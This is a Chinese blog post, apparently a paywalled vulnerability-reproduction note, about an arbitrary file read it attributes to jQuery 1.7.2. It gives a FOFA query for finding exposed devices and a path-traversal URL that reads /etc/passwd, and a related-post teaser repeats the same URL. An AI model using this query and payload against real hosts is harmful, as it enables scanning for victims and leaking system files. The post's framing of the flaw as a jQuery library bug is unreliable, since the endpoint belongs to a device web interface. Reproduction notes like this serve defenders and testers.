jQuery-1.7.2版本存在任意文件读取漏洞

已于 2023-04-23 21:44:31 修改
阅读量1.7k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: jquery javascript web安全
于 2023-04-23 21:44:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/130331390
版权

文章目录

jQuery-1.7.2版本存在任意文件读取漏洞

1. jQuery-1.7.2简介

微信公众号搜索:南风漏洞复现文库
该文章 南风漏洞复现文库 公众号首发

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。

2.漏洞描述

jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。

3.影响版本

jQuery-1.7.2

4.fofa 查询语句

body=“webui/js/jquerylib/jquery-1.7.2.min.js”

5.漏洞复现

漏洞链接:

https://127.0.0.1/webui/?g=sys_dia_data_down&file_name=../../../../../etc/passwd

了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件
jquery-1.7.2.js免费下载
10-25
Query 1.7.2正式版发布。该版本1.7.1的基础上修复了大量的bug,并改进了部分功能。而相比于1.7.2 RC1,只修复了一个bug。值得注意的是:如果你正在使用jQuery Mobile,请使用最新的jQuery 1.7.2和jQuery Mobile 1.1这两个版本,因为之前的jQuery Mobile版本还基于jQuery core 1.7.1或更早的版本jquery-1.7.2.min.js (minified, production) jquery-1.7.2.js (unminified, debug) jQuery 1.7 正式版已经可以下载使用。jQuery是一个JavaScript库,它简化了HTML文档遍历,事件处理,动画和为网络快速发展的Ajax交互。jQuery 1.7 版本加入了新的事件API .on() 和 .off(),提高了性能,以及为旧版IE浏览器提供了更好的HTML5支持。 同时 Google 及 Microsoft CDN 上的新版本也应该会在一两天内部署完毕
漏洞复现】jQuery-1.7.2 版本任意文件下载漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-27 1938
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后一个优秀的JavaScript代码库(框架) 于2006年1月由John Resig发布。 jQuery设计的宗旨是 " write Less,Do More" ,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、时间处理、动画设计和Ajax交互。
海康威视安全接入网关 任意文件读取漏洞复现
最新发布
zz12345600354的博客
04-24 337
海康威视安全接入网关使用Jquery-1.7.2 , 该版本存在任意文件读取漏洞,可获取服务器内部敏感信息泄露(安博通应用网关也存在漏洞
jQuery-1.7.2存在任意文件读取漏洞
fly夏天的博客
12-27 822
文章复现了jQuery-1.7.2存在任意文件读取漏洞。并提供了简单的利用方法
jQuery
m0_72041293的博客
03-28 210
素下匹配所有的后代元素。可以设置和获取属性的值,只推荐操作checked、readOnly、selected、disabled等等。[attribute^=value] 匹配给定的属性是以。[attribute$=value] 匹配给定的属性是以。可以设置和获取属性的值,不推荐操作checked、readOnly、selected、disabled等。[attribute!one 方法绑定的事件。
FOFA搜索语法笔记
u011975363的专栏
06-22 4717
fofa: body=“webui/js/jquerylib/jquery-1.7.2.min.js” 构造访问 /webui/?g=sys_dia_data_down&file_name=…/etc/passwd
jQuery/jquery-1.7.2.min.js jquery-1.7.2.js 文件
04-06
在提供的文件中,我们有两个版本jQuery:`jquery-1.7.2.min.js`和`jquery-1.7.2.js`。这两个文件都是jQuery 1.7.2版本,但有明显的差异。 1. `jquery-1.7.2.js`是未压缩的源代码版本,代码可读性较高,便于开发者...
jquery-1.7.2.js
12-14
解决前端跨域的问题,博文地址:https://blog.csdn.net/chw0629/article/details/111185423
jquery-1.7.2.min.js
05-12
jquery1.7-min
jQuery框架漏洞全总结及开发建议
热门推荐
iokla
10-02 1万+
一、jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了一个具有已知安全漏洞的前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。但事实上这些库有可用的不
jQuery 1.7.2 正式版, jquery 1.7.2 min.js
06-15
jQuery 1.7.2正式版发布。该版本1.7.1的基础上修复了大量的bug,并改进了部分功能。而相比于1.7.2 RC1,只修复了一个bug。值得注意的是:如果你正在使用jQuery Mobile,请使用最新的jQuery 1.7.2和jQuery Mobile 1.1这两个版本,因为之前的jQuery Mobile版本还基于jQuery core 1.7.1或更早的版本jquery-1.7.2.min.js (minified, production) jquery-1.7.2.js (unminified, debug) jQuery 1.7 正式版已经可以下载使用。jQuery是一个JavaScript库,它简化了HTML文档遍历,事件处理,动画和为网络快速发展的Ajax交互。jQuery 1.7 版本加入了新的事件API .on() 和 .off(),提高了性能,以及为旧版IE浏览器提供了更好的HTML5支持。 同时 Google 及 Microsoft CDN 上的新版本也应该会在一两天内部署完毕。
jquery-1.7.2.js 、jquery-1.7.2.min.js 【官方jquery包 js】
11-01
jquery-1.7.js 、jquery-1.7.2.min.js 【官方jquery包 js】
jquery1.7.2中文版
01-19
Query是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(或JavaScript框架)。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。
jquery-1.7.2版
05-29
Jquery是继prototype之后又一个优秀的Javascrīpt框架。它是轻量级的js库(压缩后只有21k) ,它兼容CSS3,还兼容各种浏览器 (IE 6.0+, FF 1.5+, Safari 2.0+, Opera 9.0+)。jQuery使用户能更方便地处理HTML documents、events、实现动画效果,并且方便地为网站提供AJAX交互。jQuery还有一个比较大的优势是,它的文档说明很全,而且各种 应用也说得很详细,同时还有许多成熟的插件可供选择。jQuery能够使用户的html页保持代码和html内容分离,也就是说,不用再在html里面插入一堆js来调用命令了,只需定义id即可。 jQuery由美国人John Resig创建,至今已吸引了来自世界各地的众多javascript高手加入其team,包括来自德国的Jörn Zaefferer,罗马尼亚的Stefan Petre等等。jQuery是继prototype之后又一个优秀的Javascrīpt框架。其宗旨是——WRITE LESS,DO MORE,写更少的代码,做更多的事情。
java web 04 jQuery jQuery api与jquery-1.7.2.js资料分享
皮皮亮的博客
11-10 1017
04 jQuery JavaScript Query jQuery 是一个 JavaScript 库。 jQuery 极大地简化了 JavaScript 编程。 jQuery 很容易学习。 jQuery是对标签的集合,它可以获取整个网页的标签,通过不同方式。然后可以对标签进行操作。jQuery也可以增删改查标签数组,也可以对数组进行操作。里面也内置很多jQurey方法,对其中元素进行操作。 就是对方法进行封装。 私聊发送API与jquery-1.7.2.js 就可以直接使用。 简而言之jQuery就是大佬
jquery-1.7.2.js、html输入框正则
洪君的博客
03-27 340
http://www.htmleaf.com/js/jquery/jquery-1.7.2.html CDN加速 官方: http://code.jquery.com/jquery-1.7.2.min.js http://code.jquery.com/jquery-1.7.2.js 百度: http://libs.baidu.com/jquery/1.7.2/jquery...
jQuery 1.7.2
04-11
jQuery 1.7.2是一个JavaScript库,用于简化HTML文档的遍历、事件处理、动画和Ajax操作。它提供了一种简洁的语法和跨浏览器的兼容性,使开发者能够更轻松地操作和操作HTML元素。 1. 将jQuery对象转换为DOM对象[^1]: ```javascript // 先有jQuery对象 var $element = $('.element'); // 使用下标取出相应的DOM对象 var domElement = $element; ``` 2. jQuery 1.7.2版本存在任意文件读取漏洞[^2]。这个漏洞可以被利用来读取服务器上的任意文件。攻击者可以通过构造特定的请求来读取敏感文件,从而获取敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值